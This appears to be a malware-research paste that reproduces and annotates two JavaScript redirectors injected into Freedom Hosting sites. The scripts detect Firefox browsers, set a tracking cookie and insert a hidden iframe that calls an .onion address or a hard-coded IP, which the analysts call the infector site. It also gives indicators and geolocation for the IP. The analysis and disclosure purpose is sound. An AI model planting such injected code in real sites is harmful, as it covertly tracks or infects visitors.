Fi8sVrs

Freedom Hosting FBI IFRAME Redirector Malware Script


# MalwareMustDie!
# This is the set of malicious JavaScript code injected into the Freedom Hosting site
# It contains the IFRAMER malware method used to redirect the victim to the infector site, at the URL:
# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
#
# Original copy at: www.twitlonger.com/show/n_1rlo0uu
# See the IFRAMER part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!
# Anyone who accessed an FH site with Firefox & JavaScript enabled must have been affected by this IFRAMER.
# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
# Ref: http://www.twitlonger.com/show/n_1rlo0uu
# Ref: http://pastebin.com/bu2Ya0n6
# Ref: http://pastebin.com/pmGEj9bV

# MalwareMustDie!

# This is the set of malicious JavaScript code injected into the Freedom Hosting site

# It contains the IFRAMER malware method used to redirect the victim to the infector site, at the URL:

# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0

#

# Original copy at: www.twitlonger.com/show/n_1rlo0uu

# See the IFRAMER part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!

# Anyone who accessed an FH site with Firefox & JavaScript enabled must have been affected by this IFRAMER.

# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html

# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/

# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html

# Ref: http://www.twitlonger.com/show/n_1rlo0uu

# Ref: http://pastebin.com/bu2Ya0n6

# Ref: http://pastebin.com/pmGEj9bV

// Case 1

/**
 * Writes the cookie `name=value` for the current document with path "/".
 *
 * @param name    Cookie name.
 * @param value   Cookie value; concatenated as-is, with no encoding.
 * @param minutes Lifetime in minutes; when falsy no expires attribute
 *                is written.
 *
 * Analyst note: in this sample the only visible caller is format_quick(),
 * which uses the cookie to mark a browser as already processed.
 */
function createCookie(name,value,minutes) {

if (minutes) {

var date = new Date();

// Convert the lifetime from minutes to milliseconds.
date.setTime(date.getTime()+(minutes*60*1000));

var expires = "; expires="+date.toGMTString();

}

else var expires = "";

// Only path=/ is set; no domain attribute is written.
document.cookie = name+"="+value+expires+"; path=/";

}

/**
 * Looks for a cookie called `name` in document.cookie.
 *
 * @param name Cookie name to search for.
 * @returns The text after `name=` for the first matching entry, or null
 *          when no entry starts with `name=`.
 */
function readCookie(name) {

var nameEQ = name + "=";

var ca = document.cookie.split(';');

for(var i=0;i < ca.length;i++) {

// NOTE(review): as transcribed, `c` is the whole array rather than one
// entry, so the charAt() call below would not work. The captured script
// presumably indexed the array with `i` and the index was probably lost
// to forum markup - confirm against the copies referenced in the header
// before treating this listing as an exact sample.
var c = ca;

// Strip the leading spaces that follow each ';' separator.
while (c.charAt(0)==' ') c = c.substring(1,c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);

}

return null;

}

/**
 * Browser check: returns true when any of three Firefox indicators is
 * present - document.getBoxObjectFor, window.mozInnerScreenX, or the word
 * "Firefox" (case-insensitive) in navigator.userAgent.
 *
 * Analyst note: isReady() only proceeds when this returns true, so the
 * iframe is injected for Firefox-like browsers only. This matches the
 * page header's statement that Firefox visitors were the ones affected.
 */
function isFF() {

// `!= null` is a loose comparison: it is true for any value other than
// null or undefined.
return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

}

/**
 * Creates an <iframe> pointing at a hard-coded URL and appends it to
 * document.body, which makes the visitor's browser request that URL.
 * The page header describes the target as the "infector site".
 *
 * Defender notes:
 *  - The frame is borderless, non-scrolling and 5 high, so it is easy to
 *    overlook on the rendered page.
 *  - The requestID in the URL is the same UUID that format_quick() stores
 *    in the n_serv cookie; both values are indicators for this sample.
 */
function updatify() {

var iframe = document.createElement('iframe');

iframe.style.display = "inline";

iframe.frameBorder = "0";

iframe.scrolling = "no";

// Hard-coded .onion destination with a fixed requestID query parameter.
iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";

iframe.height = "5";

// NOTE(review): "*" is not a numeric length; how the browser sizes the
// frame with this value is not shown here.
iframe.width = "*";

document.body.appendChild(iframe);

}

/**
 * Once-per-cookie gate around the iframe injection: when no n_serv cookie
 * can be read, it sets n_serv to a hard-coded UUID with a 30-minute
 * lifetime and then calls updatify() to inject the iframe.
 *
 * Forensic note: an n_serv cookie holding this UUID is an artefact of the
 * script having run in a browser profile.
 */
function format_quick() {

if ( ! readCookie("n_serv") ) {

// The third argument is the cookie lifetime in minutes.
createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);

updatify();

}

}

/**
 * Entry point of the injected script. Re-schedules itself every 250 ms
 * until document.readyState is "interactive" or "complete", then calls
 * format_quick() if isFF() reports a Firefox-like browser. Other browsers
 * reach the ready state and nothing further happens.
 */
function isReady()

{

if ( document.readyState === "interactive" || document.readyState === "complete" ) {

// Firefox-only gate in front of the cookie check and iframe injection.
if ( isFF() ) {

format_quick();

}

}

else

{

// Document not ready yet: poll again in 250 ms.
setTimeout(isReady, 250);

}

}

// Starts the readiness poll 250 ms after the injected script is evaluated;
// no user interaction is needed for the chain to run.
setTimeout(isReady, 250);

// Case 2

/**
 * Writes the cookie `name=value` for the current document with path "/".
 * Apart from spacing, the logic is the same as the Case 1 helper.
 *
 * @param name    Cookie name.
 * @param value   Cookie value; concatenated as-is, with no encoding.
 * @param minutes Lifetime in minutes; when falsy no expires attribute
 *                is written.
 */
function createCookie(name, value, minutes) {

if (minutes) {

var date = new Date();

// Convert the lifetime from minutes to milliseconds.
date.setTime(date.getTime() + (minutes * 60 * 1000));

var expires = "; expires=" + date.toGMTString();

} else var expires = "";

// Only path=/ is set; no domain attribute is written.
document.cookie = name + "=" + value + expires + "; path=/";

}

/**
 * Looks for a cookie called `name` in document.cookie.
 *
 * @param name Cookie name to search for.
 * @returns The text after `name=` for the first matching entry, or null
 *          when no entry starts with `name=`.
 */
function readCookie(name) {

var nameEQ = name + "=";

var ca = document.cookie.split(';');

for (var i = 0; i < ca.length; i++) {

// NOTE(review): as transcribed, `c` is the whole array rather than one
// entry, so the charAt() call below would not work. The captured script
// presumably indexed the array with `i` and the index was probably lost
// to forum markup - confirm against the copies referenced in the header
// before treating this listing as an exact sample.
var c = ca;

// Strip the leading spaces that follow each ';' separator.
while (c.charAt(0) == ' ') c = c.substring(1, c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);

}

return null;

}

/**
 * Browser check: returns true when any of three Firefox indicators is
 * present - document.getBoxObjectFor, window.mozInnerScreenX, or the word
 * "Firefox" (case-insensitive) in navigator.userAgent.
 *
 * Analyst note: isReady() only proceeds when this returns true, so the
 * iframe is injected for Firefox-like browsers only.
 */
function isFF() {

// `!= null` is a loose comparison: it is true for any value other than
// null or undefined.
return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

}

/**
 * Creates an <iframe> pointing at a hard-coded URL and appends it to
 * document.body, which makes the visitor's browser request that URL.
 *
 * Defender notes:
 *  - Unlike Case 1, the target is a literal IPv4 address. The page's notes
 *    below the listing attribute it to Verizon Business in Triadelphia,
 *    West Virginia.
 *  - The requestID in the URL is the same UUID that freedomhost() stores
 *    in the n_serv cookie; the address, UUID and cookie name are all
 *    indicators for this sample.
 *  - The frame is borderless, non-scrolling and 5 high, so it is easy to
 *    overlook on the rendered page.
 */
function updatify() {

var iframe = document.createElement('iframe');

iframe.style.display = "inline";

iframe.frameBorder = "0";

iframe.scrolling = "no";

// NOTE(review): the text after the semicolon on the next line
// ("<== (1) ...") is the analyst's marker, not part of the script; the
// listing does not parse as JavaScript while it is present.
iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY

iframe.height = "5";

// NOTE(review): "*" is not a numeric length; how the browser sizes the
// frame with this value is not shown here.
iframe.width = "*";

document.body.appendChild(iframe);

}

/**
 * Once-per-cookie gate around the iframe injection: when no n_serv cookie
 * can be read, it sets n_serv to a hard-coded UUID with a 30-minute
 * lifetime and then calls updatify() to inject the iframe. This plays the
 * same role as format_quick() in Case 1, with a different UUID.
 *
 * Forensic note: an n_serv cookie holding this UUID is an artefact of the
 * script having run in a browser profile.
 */
function freedomhost() {

if (!readCookie("n_serv")) {

// The third argument is the cookie lifetime in minutes.
createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);

updatify();

}

}

/**
 * Entry point of the injected script. Re-schedules itself every 250 ms
 * until document.readyState is "interactive" or "complete", then calls
 * freedomhost() if isFF() reports a Firefox-like browser. Other browsers
 * reach the ready state and nothing further happens.
 */
function isReady() {

if (document.readyState === "interactive" || document.readyState === "complete") {

// Firefox-only gate in front of the cookie check and iframe injection.
if (isFF()) {

// Commented-out debug alert, apparently left in by the script's author.
//window.alert(window.location + "Firefox Detected.")

freedomhost();

}

} else {

// Document not ready yet: poll again in 250 ms.
setTimeout(isReady, 250);

}

}

// Starts the readiness poll 250 ms after the injected script is evaluated;
// no user interaction is needed for the chain to run.
setTimeout(isReady, 250);

// Note: both scripts use the same method;

// the second script's callback goes to an IP address (details below), contacting the remote host at the line marked (1)

IP Address: 65.222.202.53

City: Triadelphia

State or Region: West Virginia

Country: United States

ISP: Verizon Business

Latitude & Longitude: 40.0900, -80.6220

Domain: verizonbusiness.com

ZIP Code: 26059

---

#MalwareMustDie! @unixfreaxjp

Source
